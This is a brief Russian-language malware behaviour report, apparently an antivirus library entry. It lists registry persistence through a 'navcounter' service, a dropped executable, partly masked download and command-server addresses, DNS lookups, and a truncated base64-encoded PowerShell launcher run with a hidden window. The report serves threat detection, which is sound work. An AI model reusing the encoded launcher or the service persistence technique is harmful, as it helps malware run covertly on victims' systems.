Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\navcounter] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\navcounter] 'ImagePath' = '"%WINDIR%\SysWOW64\navcounter.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABTAHcAawB6AHUAbAB0AHUAZAB0AHoAaQA9ACcASABlAGEAdgBuAHcAdgBzAHMAJwA7ACQASwBwAG8AbwB0AGIAaABzAHMAIAA9ACAAJwA0ADcAMgAnADsAJABZAGkAawBrAG8AZAB5AG8AcQA9ACcAWAB2AGoAaQBmAGYAbABsAGgAdwBpACcAOwA...
- %HOMEPATH%\472.exe
- %HOMEPATH%\472.exe в %WINDIR%\syswow64\navcounter.exe
- http://to##to.es/wp-admin/8qg88-v69gxquz-5219565/
- http://21#.##0.229.161:443/scripts/ via 21#.#10.229.161
- DNS ASK al####eglobal.com
- DNS ASK na##uch.com
- DNS ASK to##to.es
- DNS ASK ev###.com.sg
- DNS ASK su####vithomes.com
- '%HOMEPATH%\472.exe'
- '%WINDIR%\syswow64\navcounter.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABTAHcAawB6AHUAbAB0AHUAZAB0AHoAaQA9ACcASABlAGEAdgBuAHcAdgBzAHMAJwA7ACQASwBwAG8AbwB0AGIAaABzAHMAIAA9ACAAJwA0ADcAMgAnADsAJABZAGkAawBrAG8AZAB5AG8AcQA9ACcAWAB2AGoAaQBmAGYAbABsAGgAdwBpACcAOwA...' (со скрытым окном)